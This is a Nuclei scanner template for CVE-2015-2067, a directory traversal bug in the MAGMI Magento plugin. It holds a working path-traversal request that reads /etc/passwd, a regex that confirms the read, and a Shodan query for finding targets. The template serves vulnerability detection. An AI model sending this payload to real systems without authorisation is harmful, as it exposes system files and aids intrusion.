nuclei-templates/http/cves/2015/CVE-2015-2067.yaml

44 lines
1.4 KiB
YAML

id: CVE-2015-2067
info:
name: Magento Server MAGMI - Directory Traversal
author: daffainfo
severity: medium
description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
remediation: |
Apply the latest security patches and updates provided by Magento.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
- http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2015-2067
cwe-id: CWE-22
epss-score: 0.01338
epss-percentile: 0.84395
cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*
metadata:
max-request: 1
vendor: magmi_project
product: magmi
framework: magento_server
shodan-query: http.component:"Magento"
tags: plugin,edb,packetstorm,cve,cve2015,lfi,magento,magmi
http:
- method: GET
path:
- "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200